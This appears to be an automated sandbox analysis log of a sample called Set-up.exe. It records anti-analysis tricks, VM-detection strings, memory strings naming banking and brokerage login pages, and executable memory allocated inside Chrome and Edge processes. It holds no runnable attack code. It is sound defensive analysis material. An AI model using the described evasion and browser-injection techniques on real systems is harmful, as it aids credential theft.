Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Set-up.exe	API/Special instruction interceptor: Address: 7FF84F7AD304
Source: C:\Users\user\Desktop\Set-up.exe	API/Special instruction interceptor: Address: 7FF84F7AD744
Source: C:\Users\user\Desktop\Set-up.exe	API/Special instruction interceptor: Address: 7FF84F7B0154
Source: C:\Users\user\Desktop\Set-up.exe	API/Special instruction interceptor: Address: 7FF84F7ADA44

Source: Amcache.hve.7.dr	Binary or memory string: VMware
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: Amcache.hve.7.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Amcache.hve.7.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Amcache.hve.7.dr	Binary or memory string: vmci.sys
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Amcache.hve.7.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.24224532.B64.2408191502,BiosReleaseDate:08/19/2024,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Amcache.hve.7.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.7.dr	Binary or memory string: VMware, Inc.
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Amcache.hve.7.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Amcache.hve.7.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Amcache.hve.7.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual RAMX
Source: Amcache.hve.7.dr	Binary or memory string: VMware-42 27 d9 2e dc 89 72 dd-92 e8 86 9f a5 a6 64 93
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin`
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Amcache.hve.7.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Amcache.hve.7.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Amcache.hve.7.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h

Source: C:\Users\user\Desktop\Set-up.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_0267143D RtlInitAnsiString,LdrGetProcedureAddress,

0_2_0267143D

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_02685BC0 mov eax, dword ptr fs:[00000030h]	0_2_02685BC0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_043D062F mov edx, dword ptr fs:[00000030h]	0_2_043D062F
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_043D0BEF mov eax, dword ptr fs:[00000030h]	0_2_043D0BEF
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_043D123F mov eax, dword ptr fs:[00000030h]	0_2_043D123F
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_043D123E mov eax, dword ptr fs:[00000030h]	0_2_043D123E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_043D1C2D mov eax, dword ptr fs:[00000030h]	0_2_043D1C2D
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_043D0F9F mov eax, dword ptr fs:[00000030h]	0_2_043D0F9F

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0230000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0240000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0250000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0260000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0270000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 14384170000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 14384180000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 14384190000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 143841A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 143841B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 143841C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FED0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FEE0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FEF0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FF00000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FF10000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FF20000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 27687980000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 27687990000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 276879A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 276879B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 276879C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 276879D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF380000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF390000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF3A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF3B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF3C0000 protect: page execute and read and write	Jump to behavior
